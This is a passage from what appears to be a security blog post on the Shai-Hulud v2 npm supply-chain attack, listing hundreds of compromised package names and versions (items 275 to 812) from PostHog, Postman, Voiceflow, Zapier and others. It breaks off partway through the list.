(v0.6.2)\r\n275. @oku-ui/toggle (v0.6.2)\r\n276. @oku-ui/toggle-group (v0.6.2)\r\n277. @oku-ui/toolbar (v0.6.2)\r\n278. @oku-ui/tooltip (v0.6.2)\r\n279. @oku-ui/use-composable (v0.6.2)\r\n280. @oku-ui/utils (v0.6.2)\r\n281. @oku-ui/visually-hidden (v0.6.2)\r\n282. @orbitgtbelgium/mapbox-gl-draw-cut-polygon-mode (v2.0.5)\r\n283. @orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode (v1.1.1)\r\n284. @orbitgtbelgium/orbit-components (v1.2.9)\r\n285. @orbitgtbelgium/time-slider (v1.0.187)\r\n286. @osmanekrem/bmad (v1.0.6)\r\n287. @osmanekrem/error-handler (v1.2.2)\r\n288. @pergel/cli (v0.11.1)\r\n289. @pergel/module-box (v0.6.1)\r\n290. @pergel/module-graphql (v0.6.1)\r\n291. @pergel/module-ui (v0.0.9)\r\n292. @pergel/nuxt (v0.25.5)\r\n293. @posthog/agent (v1.24.1)\r\n294. @posthog/ai (v7.1.2)\r\n295. @posthog/automatic-cohorts-plugin (v0.0.8)\r\n296. @posthog/bitbucket-release-tracker (v0.0.8)\r\n297. @posthog/cli (v0.5.15)\r\n298. @posthog/clickhouse (v1.7.1)\r\n299. @posthog/core (v1.5.6)\r\n300. @posthog/currency-normalization-plugin (v0.0.8)\r\n301. @posthog/customerio-plugin (v0.0.8)\r\n302. @posthog/databricks-plugin (v0.0.8)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 16 of 29\n\n303. @posthog/drop-events-on-property-plugin (v0.0.8)\r\n304. @posthog/event-sequence-timer-plugin (v0.0.8)\r\n305. @posthog/filter-out-plugin (v0.0.8)\r\n306. @posthog/first-time-event-tracker (v0.0.8)\r\n307. @posthog/geoip-plugin (v0.0.8)\r\n308. @posthog/github-release-tracking-plugin (v0.0.8)\r\n309. @posthog/gitub-star-sync-plugin (v0.0.8)\r\n310. @posthog/heartbeat-plugin (v0.0.8)\r\n311. @posthog/hedgehog-mode (v0.0.42)\r\n312. @posthog/icons (v0.36.1)\r\n313. @posthog/ingestion-alert-plugin (v0.0.8)\r\n314. @posthog/intercom-plugin (v0.0.8)\r\n315. @posthog/kinesis-plugin (v0.0.8)\r\n316. @posthog/laudspeaker-plugin (v0.0.8)\r\n317. @posthog/lemon-ui (v0.0.1)\r\n318. @posthog/maxmind-plugin (v0.1.6)\r\n319. @posthog/migrator3000-plugin (v0.0.8)\r\n320. @posthog/netdata-event-processing (v0.0.8)\r\n321. @posthog/nextjs (v0.0.3)\r\n322. @posthog/nextjs-config (v1.5.1)\r\n323. @posthog/nuxt (v1.2.9)\r\n324. @posthog/pagerduty-plugin (v0.0.8)\r\n325. @posthog/piscina (v3.2.1)\r\n326. @posthog/plugin-contrib (v0.0.6)\r\n327. @posthog/plugin-server (v1.10.8)\r\n328. @posthog/plugin-unduplicates (v0.0.8)\r\n329. @postman/pm-bin-linux-x64 (v1.24.3)\r\n330. @postman/pm-bin-linux-x64 (v1.24.4)\r\n331. @postman/pm-bin-linux-x64 (v1.24.5)\r\n332. @posthog/postgres-plugin (v0.0.8)\r\n333. @posthog/react-rrweb-player (v1.1.4)\r\n334. @posthog/rrdom (v0.0.31)\r\n335. @posthog/rrweb (v0.0.31)\r\n336. @posthog/rrweb-player (v0.0.31)\r\n337. @posthog/rrweb-record (v0.0.31)\r\n338. @posthog/rrweb-replay (v0.0.19)\r\n339. @posthog/rrweb-snapshot (v0.0.31)\r\n340. @posthog/rrweb-utils (v0.0.31)\r\n341. @posthog/sendgrid-plugin (v0.0.8)\r\n342. @posthog/siphash (v1.1.2)\r\n343. @posthog/snowflake-export-plugin (v0.0.8)\r\n344. @posthog/taxonomy-plugin (v0.0.8)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 17 of 29\n\n345. @posthog/twilio-plugin (v0.0.8)\r\n346. @posthog/twitter-followers-plugin (v0.0.8)\r\n347. @posthog/url-normalizer-plugin (v0.0.8)\r\n348. @posthog/variance-plugin (v0.0.8)\r\n349. @posthog/web-dev-server (v1.0.5)\r\n350. @posthog/wizard (v1.18.1)\r\n351. @posthog/zendesk-plugin (v0.0.8)\r\n352. @postman/aether-icons (v2.23.2, v2.23.3, v2.23.4)\r\n353. @postman/csv-parse (v4.0.3, v4.0.4, v4.0.5)\r\n354. @postman/final-node-keytar (v7.9.1, v7.9.2, v7.9.3)\r\n355. @postman/mcp-ui-client (v5.5.1, v5.5.2, v5.5.3)\r\n356. @postman/node-keytar (v7.9.4, v7.9.5, v7.9.6)\r\n357. @postman/pm-bin-linux-x64 (v1.24.4, v1.24.5)\r\n358. @postman/pm-bin-macos-arm64 (v1.24.3, v1.24.4, v1.24.5)\r\n359. @postman/pm-bin-macos-x64 (v1.24.3, v1.24.4)\r\n360. @postman/pm-bin-windows-x64 (v1.24.3, v1.24.4, v1.24.5)\r\n361. @postman/postman-collection-fork (v4.3.3, v4.3.4, v4.3.5)\r\n362. @postman/postman-mcp-cli (v1.0.3, v1.0.4, v1.0.5)\r\n363. @postman/postman-mcp-server (v2.4.10, v2.4.11, v2.4.12)\r\n364. @postman/pretty-ms (v6.1.1, v6.1.2, v6.1.3)\r\n365. @postman/secret-scanner-wasm (v2.1.2, v2.1.3, v2.1.4)\r\n366. @postman/tunnel-agent (v0.6.5, v0.6.6, v0.6.7)\r\n367. @postman/wdio-allure-reporter (v0.0.7, v0.0.8, v0.0.9)\r\n368. @postman/wdio-junit-reporter (v0.0.4, v0.0.5, v0.0.6)\r\n369. @pradhumngautam/common-app (v1.0.2)\r\n370. @productdevbook/animejs-vue (v0.2.1)\r\n371. @productdevbook/auth (v0.2.2)\r\n372. @productdevbook/chatwoot (v2.0.1)\r\n373. @productdevbook/motion (v1.0.4)\r\n374. @productdevbook/ts-i18n (v1.4.2)\r\n375. @pruthvi21/use-debounce (v1.0.3)\r\n376. @quick-start-soft/quick-document-translator (v1.4.2511142126)\r\n377. @quick-start-soft/quick-git-clean-markdown (v1.4.2511142126)\r\n378. @quick-start-soft/quick-markdown (v1.4.2511142126)\r\n379. @quick-start-soft/quick-markdown-compose (v1.4.2506300029)\r\n380. @quick-start-soft/quick-markdown-image (v1.4.2511142126)\r\n381. @quick-start-soft/quick-markdown-print (v1.4.2511142126)\r\n382. @quick-start-soft/quick-markdown-translator (v1.4.2509202331)\r\n383. @quick-start-soft/quick-remove-image-background (v1.4.2511142126)\r\n384. @quick-start-soft/quick-task-refine (v1.4.2511142126)\r\n385. @relyt/claude-context-core (v0.1.1)\r\n386. @relyt/claude-context-mcp (v0.1.1)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 18 of 29\n\n387. @relyt/mcp-server-relytone (v0.0.3)\r\n388. @sameepsi/sor (v1.0.3, v2.0.2)\r\n389. @sameepsi/sor2 (v2.0.2)\r\n390. @seezo/sdr-mcp-server (v0.0.5)\r\n391. @seung-ju/next (v0.0.2)\r\n392. @seung-ju/openapi-generator (v0.0.4)\r\n393. @seung-ju/react-hooks (v0.0.2)\r\n394. @seung-ju/react-native-action-sheet (v0.2.1)\r\n395. @silgi/better-auth (v0.8.1)\r\n396. @silgi/drizzle (v0.8.4)\r\n397. @silgi/ecosystem (v0.7.6)\r\n398. @silgi/graphql (v0.7.15)\r\n399. @silgi/module-builder (v0.8.8)\r\n400. @silgi/openapi (v0.7.4)\r\n401. @silgi/permission (v0.6.8)\r\n402. @silgi/ratelimit (v0.2.1)\r\n403. @silgi/scalar (v0.6.2)\r\n404. @silgi/yoga (v0.7.1)\r\n405. @sme-ui/aoma-vevasound-metadata-lib (v0.1.3)\r\n406. @strapbuild/react-native-date-time-picker (v2.0.4)\r\n407. @strapbuild/react-native-perspective-image-cropper (v0.4.15)\r\n408. @strapbuild/react-native-perspective-image-cropper-2 (v0.4.7)\r\n409. @strapbuild/react-native-perspective-image-cropper-poojan31 (v0.4.6)\r\n410. @suraj_h/medium-common (v1.0.5)\r\n411. @thedelta/eslint-config (v1.0.2)\r\n412. @tiaanduplessis/json (v2.0.2, v2.0.3)\r\n413. @tiaanduplessis/react-progressbar (v1.0.1, v1.0.2)\r\n414. @trackstar/angular-trackstar-link (v1.0.2)\r\n415. @trackstar/react-trackstar-link (v2.0.21)\r\n416. @trackstar/react-trackstar-link-upgrade (v1.1.10)\r\n417. @trackstar/test-angular-package (v0.0.9)\r\n418. @trackstar/test-package (v1.1.5)\r\n419. @trefox/sleekshop-js (v0.1.6)\r\n420. @trigo/atrix (v7.0.1)\r\n421. @trigo/atrix-acl (v4.0.2)\r\n422. @trigo/atrix-elasticsearch (v2.0.1)\r\n423. @trigo/atrix-mongoose (v1.0.2)\r\n424. @trigo/atrix-orientdb (v1.0.2)\r\n425. @trigo/atrix-postgres (v1.0.3)\r\n426. @trigo/atrix-pubsub (v4.0.3)\r\n427. @trigo/atrix-redis (v1.0.2)\r\n428. @trigo/atrix-soap (v1.0.2)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 19 of 29\n\n429. @trigo/atrix-swagger (v3.0.1)\r\n430. @trigo/bool-expressions (v4.1.3)\r\n431. @trigo/eslint-config-trigo (v3.3.1)\r\n432. @trigo/fsm (v3.4.2)\r\n433. @trigo/hapi-auth-signedlink (v1.3.1)\r\n434. @trigo/jsdt (v0.2.1)\r\n435. @trigo/keycloak-api (v1.3.1)\r\n436. @trigo/node-soap (v0.5.4)\r\n437. @trigo/pathfinder-ui-css (v0.1.1)\r\n438. @trigo/trigo-hapijs (v5.0.1)\r\n439. @trpc-rate-limiter/cloudflare (v0.1.4)\r\n440. @trpc-rate-limiter/hono (v0.1.4)\r\n441. @varsityvibe/api-client (v1.3.36)\r\n442. @varsityvibe/api-client (v1.3.37)\r\n443. @varsityvibe/utils (v5.0.6)\r\n444. @varsityvibe/validation-schemas (v0.6.7, v0.6.8)\r\n445. @viapip/eslint-config (v0.2.4)\r\n446. @vishadtyagi/full-year-calendar (v0.1.11)\r\n447. @voiceflow/alexa-types (v2.15.60, v2.15.61)\r\n448. @voiceflow/anthropic (v0.4.4, v0.4.5)\r\n449. @voiceflow/api-sdk (v3.28.58, v3.28.59)\r\n450. @voiceflow/backend-utils (v5.0.1, v5.0.2)\r\n451. @voiceflow/base-types (v2.136.2, v2.136.3)\r\n452. @voiceflow/body-parser (v1.21.2, v1.21.3)\r\n453. @voiceflow/chat-types (v2.14.58, v2.14.59)\r\n454. @voiceflow/circleci-config-sdk-orb-import (v0.2.1, v0.2.2)\r\n455. @voiceflow/commitlint-config (v2.6.1, v2.6.2)\r\n456. @voiceflow/common (v8.9.1, v8.9.2)\r\n457. @voiceflow/default-prompt-wrappers (v1.7.3, v1.7.4)\r\n458. @voiceflow/dependency-cruiser-config (v1.8.11, v1.8.12)\r\n459. @voiceflow/dtos-interact (v1.40.1, v1.40.2)\r\n460. @voiceflow/encryption (v0.3.2, v0.3.3)\r\n461. @voiceflow/eslint-config (v7.16.4, v7.16.5)\r\n462. @voiceflow/eslint-plugin (v1.6.1, v1.6.2)\r\n463. @voiceflow/exception (v1.10.1, v1.10.2)\r\n464. @voiceflow/fetch (v1.11.1, v1.11.2)\r\n465. @voiceflow/general-types (v3.2.22, v3.2.23)\r\n466. @voiceflow/git-branch-check (v1.4.3, v1.4.4)\r\n467. @voiceflow/google-dfes-types (v2.17.12, v2.17.13)\r\n468. @voiceflow/google-types (v2.21.12, v2.21.13)\r\n469. @voiceflow/husky-config (v1.3.1, v1.3.2)\r\n470. @voiceflow/logger (v2.4.2, v2.4.3)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 20 of 29\n\n471. @voiceflow/metrics (v1.5.1, v1.5.2)\r\n472. @voiceflow/natural-language-commander (v0.5.2, v0.5.3)\r\n473. @voiceflow/nestjs-common (v2.75.2, v2.75.3)\r\n474. @voiceflow/nestjs-mongodb (v1.3.1, v1.3.2)\r\n475. @voiceflow/nestjs-rate-limit (v1.3.2, v1.3.3)\r\n476. @voiceflow/nestjs-redis (v1.3.1, v1.3.2)\r\n477. @voiceflow/nestjs-timeout (v1.3.1, v1.3.2)\r\n478. @voiceflow/npm-package-json-lint-config (v1.1.1, v1.1.2)\r\n479. @voiceflow/openai (v3.2.2, v3.2.3)\r\n480. @voiceflow/pino (v6.11.3, v6.11.4)\r\n481. @voiceflow/pino-pretty (v4.4.1, v4.4.2)\r\n482. @voiceflow/prettier-config (v1.10.1, v1.10.2)\r\n483. @voiceflow/react-chat (v1.65.3, v1.65.4)\r\n484. @voiceflow/runtime (v1.29.1, v1.29.2)\r\n485. @voiceflow/runtime-client-js (v1.17.2, v1.17.3)\r\n486. @voiceflow/sdk-runtime (v1.43.1, v1.43.2)\r\n487. @voiceflow/secrets-provider (v1.9.2, v1.9.3)\r\n488. @voiceflow/semantic-release-config (v1.4.1, v1.4.2)\r\n489. @voiceflow/serverless-plugin-typescript (v2.1.7, v2.1.8)\r\n490. @voiceflow/slate-serializer (v1.7.3, v1.7.4)\r\n491. @voiceflow/stitches-react (v2.3.2, v2.3.3)\r\n492. @voiceflow/storybook-config (v1.2.2, v1.2.3)\r\n493. @voiceflow/stylelint-config (v1.1.1, v1.1.2)\r\n494. @voiceflow/test-common (v2.1.1, v2.1.2)\r\n495. @voiceflow/tsconfig (v1.12.1, v1.12.2)\r\n496. @voiceflow/tsconfig-paths (v1.1.4, v1.1.5)\r\n497. @voiceflow/utils-designer (v1.74.19, v1.74.20)\r\n498. @voiceflow/verror (v1.1.4, v1.1.5)\r\n499. @voiceflow/vite-config (v2.6.2, v2.6.3)\r\n500. @voiceflow/vitest-config (v1.10.2, v1.10.3)\r\n501. @voiceflow/voice-types (v2.10.58, v2.10.59)\r\n502. @voiceflow/voiceflow-types (v3.32.45, v3.32.46)\r\n503. @voiceflow/widget (v1.7.18, v1.7.19)\r\n504. @vucod/email (v0.0.3)\r\n505. @zapier/ai-actions (v0.1.18, v0.1.19, v0.1.20)\r\n506. @zapier/ai-actions-react (v0.1.12, v0.1.13, v0.1.14)\r\n507. @zapier/babel-preset-zapier (v6.4.1, v6.4.2, v6.4.3)\r\n508. @zapier/browserslist-config-zapier (v1.0.3, v1.0.4, v1.0.5)\r\n509. @zapier/eslint-plugin-zapier (v11.0.3, v11.0.4, v11.0.5)\r\n510. @zapier/mcp-integration (v3.0.1, v3.0.2, v3.0.3)\r\n511. @zapier/secret-scrubber (v1.1.3, v1.1.4, v1.1.5)\r\n512. @zapier/spectral-api-ruleset (v1.9.1, v1.9.2, v1.9.3)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 21 of 29\n\n513. @zapier/stubtree (v0.1.2, v0.1.3, v0.1.4)\r\n514. @zapier/zapier-sdk (v0.15.5, v0.15.6, v0.15.7)\r\n515. 02-echo (v0.0.7)\r\n516. ai-crowl-shield (v1.0.7)\r\n517. arc-cli-fc (v1.0.1)\r\n518. asciitranslator (v1.0.3)\r\n519. asyncapi-preview (v1.0.1)\r\n520. asyncapi-preview (v1.0.2)\r\n521. atrix (v1.0.1)\r\n522. atrix-mongoose (v1.0.1)\r\n523. automation_model (v1.0.491)\r\n524. avvvatars-vue (v1.1.2)\r\n525. axios-builder (v1.2.1)\r\n526. axios-cancelable (v1.0.1, v1.0.2)\r\n527. axios-timed (v1.0.1, v1.0.2)\r\n528. babel-preset-kinvey-flex-service (v0.1.1)\r\n529. barebones-css (v1.1.3, v1.1.4)\r\n530. benmostyn-frame-print (v1.0.1)\r\n531. best_gpio_controller (v1.0.10)\r\n532. better-auth-nuxt (v0.0.10)\r\n533. better-queue-nedb (v0.1.5)\r\n534. bidirectional-adapter (v1.2.2, v1.2.3)\r\n535. bidirectional-adapter (v1.2.4, v1.2.5)\r\n536. blinqio-executions-cli (v1.0.41)\r\n537. blob-to-base64 (v1.0.3)\r\n538. bool-expressions (v0.1.2)\r\n539. buffered-interpolation-babylon6 (v0.2.8)\r\n540. bun-plugin-httpfile (v0.1.1)\r\n541. bytecode-checker-cli (v1.0.8, v1.0.9, v1.0.10, v1.0.11)\r\n542. bytes-to-x (v1.0.1)\r\n543. calc-loan-interest (v1.0.4)\r\n544. capacitor-plugin-apptrackingios (v0.0.21)\r\n545. capacitor-plugin-purchase (v0.1.1)\r\n546. capacitor-plugin-scgssigninwithgoogle (v0.0.5)\r\n547. capacitor-purchase-history (v0.0.10)\r\n548. capacitor-voice-recorder-wav (v6.0.3)\r\n549. ceviz (v0.0.5)\r\n550. chrome-extension-downloads (v0.0.3, v0.0.4)\r\n551. claude-token-updater (v1.0.3)\r\n552. coinmarketcap-api (v3.1.2, v3.1.3)\r\n553. colors-regex (v2.0.1)\r\n554. command-irail (v0.5.4)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 22 of 29\n\n555. compare-obj (v1.1.1, v1.1.2)\r\n556. composite-reducer (v1.0.2, v1.0.3, v1.0.4, v1.0.5)\r\n557. count-it-down (v1.0.1, v1.0.2)\r\n558. cpu-instructions (v0.0.14)\r\n559. create-director-app (v0.1.1)\r\n560. create-glee-app (v0.2.2)\r\n561. create-glee-app (v0.2.3)\r\n562. create-hardhat3-app (v1.1.1, v1.1.2, v1.1.3, v1.1.4)\r\n563. create-kinvey-flex-service (v0.2.1)\r\n564. create-mcp-use-app (v0.5.3, v0.5.4)\r\n565. create-silgi (v0.3.1)\r\n566. crypto-addr-codec (v0.1.9)\r\n567. css-dedoupe (v0.1.2)\r\n568. csv-tool-cli (v1.2.1)\r\n569. dashboard-empty-state (v1.0.3)\r\n570. designstudiouiux (v1.0.1)\r\n571. devstart-cli (v1.0.6)\r\n572. dialogflow-es (v1.1.1, v1.1.2, v1.1.3, v1.1.4)\r\n573. discord-bot-server (v0.1.2)\r\n574. docusaurus-plugin-vanilla-extract (v1.0.3)\r\n575. dont-go (v1.1.2)\r\n576. dotnet-template (v0.0.3)\r\n577. dotnet-template (v0.0.4)\r\n578. drop-events-on-property-plugin (v0.0.2)\r\n579. easypanel-sdk (v0.3.2)\r\n580. electron-volt (v0.0.2)\r\n581. email-deliverability-tester (v1.1.1)\r\n582. enforce-branch-name (v1.1.3)\r\n583. esbuild-plugin-brotli (v0.2.1)\r\n584. esbuild-plugin-eta (v0.1.1)\r\n585. esbuild-plugin-httpfile (v0.4.1)\r\n586. eslint-config-kinvey-flex-service (v0.1.1)\r\n587. eslint-config-nitpicky (v4.0.1)\r\n588. eslint-config-trigo (v22.0.2)\r\n589. eslint-config-zeallat-base (v1.0.4)\r\n590. ethereum-ens (v0.8.1)\r\n591. evm-checkcode-cli (v1.0.12, v1.0.13, v1.0.14, v1.0.15)\r\n592. exact-ticker (v0.3.5)\r\n593. expo-audio-session (v0.2.1)\r\n594. expo-router-on-rails (v0.0.4)\r\n595. express-starter-template (v1.0.10)\r\n596. expressos (v1.1.3)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 23 of 29\n\n597. fat-fingered (v1.0.1, v1.0.2)\r\n598. feature-flip (v1.0.1, v1.0.2)\r\n599. firestore-search-engine (v1.2.3)\r\n600. fittxt (v1.0.2, v1.0.3)\r\n601. flapstacks (v1.0.1, v1.0.2)\r\n602. flatten-unflatten (v1.0.1, v1.0.2)\r\n603. formik-error-focus (v2.0.1)\r\n604. formik-store (v1.0.1)\r\n605. frontity-starter-theme (v1.0.1)\r\n606. fuzzy-finder (v1.0.5, v1.0.6)\r\n607. gate-evm-check-code2 (v2.0.3, v2.0.4, v2.0.5, v2.0.6)\r\n608. gate-evm-tools-test (v1.0.5, v1.0.6, v1.0.7, v1.0.8)\r\n609. gatsby-plugin-antd (v2.2.1)\r\n610. gatsby-plugin-cname (v1.0.1, v1.0.2)\r\n611. generator-meteor-stock (v0.1.6)\r\n612. generator-ng-itobuz (v0.0.15)\r\n613. get-them-args (v1.3.3)\r\n614. github-action-for-generator (v2.1.27)\r\n615. github-action-for-generator (v2.1.28)\r\n616. gitsafe (v1.0.5)\r\n617. go-template (v0.1.8)\r\n618. go-template (v0.1.9)\r\n619. gulp-inject-envs (v1.2.1, v1.2.2)\r\n620. haufe-axera-api-client (v0.0.1, v0.0.2)\r\n621. hope-mapboxdraw (v0.1.1)\r\n622. hopedraw (v1.0.3)\r\n623. hover-design-prototype (v0.0.5)\r\n624. httpness (v1.0.2, v1.0.3)\r\n625. hyper-fullfacing (v1.0.3)\r\n626. hyperterm-hipster (v1.0.7)\r\n627. ids-css (v1.5.1)\r\n628. ids-enterprise-mcp-server (v0.0.2)\r\n629. ids-enterprise-ng (v20.1.6)\r\n630. ids-enterprise-typings (v20.1.6)\r\n631. image-to-uri (v1.0.1, v1.0.2)\r\n632. insomnia-plugin-random-pick (v1.0.4)\r\n633. invo (v0.2.2)\r\n634. iron-shield-miniapp (v0.0.2)\r\n635. ito-button (v8.0.3)\r\n636. itobuz-angular (v0.0.1)\r\n637. itobuz-angular-auth (v8.0.11)\r\n638. itobuz-angular-button (v8.0.11)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 24 of 29\n\n639. jacob-zuma (v1.0.1, v1.0.2)\r\n640. jaetut-varit-test (1.0.2)\r\n641. jan-browser (v0.13.1)\r\n642. jquery-bindings (v1.1.2, v1.1.3)\r\n643. jsonsurge (v1.0.7)\r\n644. just-toasty (v1.7.1)\r\n645. kill-port (v2.0.2, v2.0.3)\r\n646. kinetix-default-token-list (v1.0.5)\r\n647. kinvey-cli-wrapper (v0.3.1)\r\n648. kinvey-flex-scripts (v0.5.1)\r\n649. kns-error-code (v1.0.8)\r\n650. korea-administrative-area-geo-json-util (v1.0.7)\r\n651. kwami (v1.5.9, v1.5.10)\r\n652. lang-codes (v1.0.1, v1.0.2)\r\n653. license-o-matic (v1.2.1, v1.2.2)\r\n654. lint-staged-imagemin (v1.3.1, v1.3.2)\r\n655. lite-serper-mcp-server (v0.2.2)\r\n656. lui-vue-test (v0.70.9)\r\n657. luno-api (v1.2.3)\r\n658. m25-transaction-utils (v1.1.16)\r\n659. manual-billing-system-miniapp-api (v1.3.1)\r\n660. mcp-use (v1.4.2, v1.4.3)\r\n661. medusa-plugin-announcement (v0.0.3)\r\n662. medusa-plugin-logs (v0.0.17)\r\n663. medusa-plugin-momo (v0.0.68)\r\n664. medusa-plugin-product-reviews-kvy (v0.0.4)\r\n665. medusa-plugin-zalopay (v0.0.40)\r\n666. mod10-check-digit (v1.0.1)\r\n667. mon-package-react-typescript (v1.0.1)\r\n668. my-saeed-lib (v0.1.1)\r\n669. n8n-nodes-tmdb (v0.5.1)\r\n670. n8n-nodes-vercel-ai-sdk (v0.1.7)\r\n671. n8n-nodes-viral-app (v0.2.5)\r\n672. nanoreset (v7.0.1, v7.0.2)\r\n673. next-circular-dependency (v1.0.2, v1.0.3)\r\n674. next-simple-google-analytics (v1.1.1, v1.1.2)\r\n675. next-styled-nprogress (v1.0.4, v1.0.5)\r\n676. ngx-useful-swiper-prosenjit (v9.0.2)\r\n677. ngx-wooapi (v12.0.1)\r\n678. nitro-graphql (v1.5.12)\r\n679. nitro-kutu (v0.1.1)\r\n680. nitrodeploy (v1.0.8)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 25 of 29\n\n681. nitroping (v0.1.1)\r\n682. normal-store (v1.3.1, v1.3.2, v1.3.3, v1.3.4)\r\n683. nuxt-keycloak (v0.2.2)\r\n684. obj-to-css (v1.0.2, v1.0.3)\r\n685. okta-react-router-6 (v5.0.1)\r\n686. open2internet (v0.1.1)\r\n687. orbit-boxicons (v2.1.3)\r\n688. orbit-nebula-draw-tools (v1.0.10)\r\n689. orbit-nebula-editor (v1.0.2)\r\n690. orbit-soap (v0.43.13)\r\n691. orchestrix (v12.1.2)\r\n692. package-tester (v1.0.1)\r\n693. parcel-plugin-asset-copier (v1.1.2, v.1.1.3)\r\n694. pdf-annotation (v0.0.2)\r\n695. pergel (v0.13.2)\r\n696. pergeltest (v0.0.25)\r\n697. piclite (v1.0.1)\r\n698. pico-uid (v1.0.3, v1.0.4)\r\n699. pkg-readme (v1.1.1)\r\n700. posthog-react-native-session-replay (v1.2.2)\r\n701. poper-react-sdk (v0.1.2)\r\n702. posthog-docusaurus (v2.0.6)\r\n703. posthog-js (v1.297.3)\r\n704. posthog-node (v4.18.1, v5.11.3, v5.13.3)\r\n705. posthog-node (v4.18.1) - Java/Maven\r\n706. posthog-plugin-hello-world (v1.0.1)\r\n707. posthog-react-native (v4.11.1, v4.12.5)\r\n708. prime-one-table (v0.0.19)\r\n709. prompt-eng (v1.0.50)\r\n710. prompt-eng-server (v1.0.18)\r\n711. puny-req (v1.0.3)\r\n712. quickswap-ads-list (v1.0.33)\r\n713. quickswap-default-staking-list (v1.0.11)\r\n714. quickswap-default-staking-list-address (v1.0.55)\r\n715. quickswap-default-token-list (v1.5.16)\r\n716. quickswap-router-sdk (v1.0.1)\r\n717. quickswap-sdk (v3.0.44)\r\n718. quickswap-smart-order-router (v1.0.1)\r\n719. quickswap-token-lists (v1.0.3)\r\n720. quickswap-v2-sdk (v2.0.1)\r\n721. ra-auth-firebase (v1.0.3)\r\n722. ra-data-firebase (v1.0.7, v1.0.8)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 26 of 29\n\n723. react-component-taggers (v0.1.9)\r\n724. react-data-to-export (v1.0.1)\r\n725. react-element-prompt-inspector (v0.1.18)\r\n726. react-favic (v1.0.2)\r\n727. react-hook-form-persist (v3.0.1, v3.0.2)\r\n728. react-jam-icons (v1.0.1, v1.0.2)\r\n729. react-keycloak-context (v1.0.8, v1.0.9)\r\n730. react-library-setup (v0.0.6)\r\n731. react-linear-loader (v1.0.2)\r\n732. react-micromodal.js (v1.0.1, v1.0.2)\r\n733. react-native-datepicker-modal (v1.3.1, v1.3.2)\r\n734. react-native-email (v2.1.1, v2.1.2)\r\n735. react-native-fetch (v2.0.1, v2.0.2)\r\n736. react-native-get-pixel-dimensions (v1.0.1, v1.0.2)\r\n737. react-native-google-maps-directions (v2.1.2)\r\n738. react-native-jam-icons (v1.0.1, v1.0.2)\r\n739. react-native-log-level (v1.2.1, v1.2.2)\r\n740. react-native-modest-checkbox (v3.3.1)\r\n741. react-native-modest-storage (v2.1.1)\r\n742. react-native-phone-call (v1.2.1, v1.2.2)\r\n743. react-native-retriable-fetch (v2.0.1, v2.0.2)\r\n744. react-native-use-modal (v1.0.3)\r\n745. react-native-view-finder (v1.2.1, v1.2.2)\r\n746. react-native-websocket (v1.0.3, v1.0.4)\r\n747. react-native-worklet-functions (v3.3.3)\r\n748. react-packery-component (v1.0.3)\r\n749. react-qr-image (v1.1.1)\r\n750. react-scrambled-text (v1.0.4, v1.0.5)\r\n751. rediff (v1.0.5)\r\n752. rediff-viewer (v0.0.7)\r\n753. redux-forge (v2.5.3)\r\n754. redux-router-kit (v1.2.2, v1.2.3, v1.2.4)\r\n755. revenuecat (v1.0.1)\r\n756. rollup-plugin-httpfile (v0.2.1)\r\n757. sa-company-registration-number-regex (v1.0.1, v1.0.2)\r\n758. sa-id-gen (v1.0.4, v1.0.5)\r\n759. samesame (v1.0.3)\r\n760. scgs-capacitor-subscribe (v1.0.11)\r\n761. scgsffcreator (v1.0.5)\r\n762. schob (v1.0.3)\r\n763. selenium-session (v1.0.5)\r\n764. selenium-session-client (v1.0.4)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 27 of 29\n\n765. set-nested-prop (v2.0.1, v2.0.2)\r\n766. shelf-jwt-sessions (v0.1.2)\r\n767. shell-exec (v1.1.3, v1.1.4)\r\n768. shinhan-limit-scrap (v1.0.3)\r\n769. silgi (v0.43.30)\r\n770. simplejsonform (v1.0.1)\r\n771. skills-use (v0.1.1, v0.1.2)\r\n772. solomon-api-stories (v1.0.2)\r\n773. solomon-v3-stories (v1.15.6)\r\n774. solomon-v3-ui-wrapper (v1.6.1)\r\n775. soneium-acs (v1.0.1)\r\n776. sort-by-distance (v2.0.1)\r\n777. south-african-id-info (v1.0.2)\r\n778. stat-fns (v1.0.1)\r\n779. stoor (v2.3.2)\r\n780. sufetch (v0.4.1)\r\n781. super-commit (v1.0.1)\r\n782. svelte-autocomplete-select (v1.1.1)\r\n783. svelte-toasty (v1.1.2, v1.1.3)\r\n784. tanstack-shadcn-table (v1.1.5)\r\n785. tavily-module (v1.0.1)\r\n786. tcsp (v2.0.2)\r\n787. tcsp-draw-test (v1.0.5)\r\n788. tcsp-test-vd (v2.4.4)\r\n789. template-lib (v1.1.3, v1.1.4)\r\n790. template-micro-service (v1.0.2, v1.0.3)\r\n791. tenacious-fetch (v2.3.2, v2.3.3)\r\n792. test-foundry-app (v1.0.1, v1.0.2, v1.0.3, v1.0.4)\r\n793. test-hardhat-app (v1.0.1, v1.0.2, v1.0.3, v1.0.4)\r\n794. test23112222-api (v1.0.1)\r\n795. tiaan (v1.0.2)\r\n796. tiptap-shadcn-vue (v0.2.1)\r\n797. token.js-fork (v0.7.32)\r\n798. toonfetch (v0.3.2)\r\n799. trigo-react-app (v4.1.2)\r\n800. ts-relay-cursor-paging (v2.1.1)\r\n801. typeface-antonio-complete (v1.0.5)\r\n802. typefence (v1.2.2, v1.2.3)\r\n803. typeorm-orbit (v0.2.27)\r\n804. unadapter (v0.1.3)\r\n805. undefsafe-typed (v1.0.3, v1.0.4)\r\n806. unemail (v0.3.1)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 28 of 29\n\n807. uniswap-router-sdk (v1.6.2)\r\n808. uniswap-smart-order-router (v3.16.26)\r\n809. uniswap-test-sdk-core (v4.0.8)\r\n810. unsearch (v0.0.3)\r\n811. uplandui (v0.5.4)\r\n812. 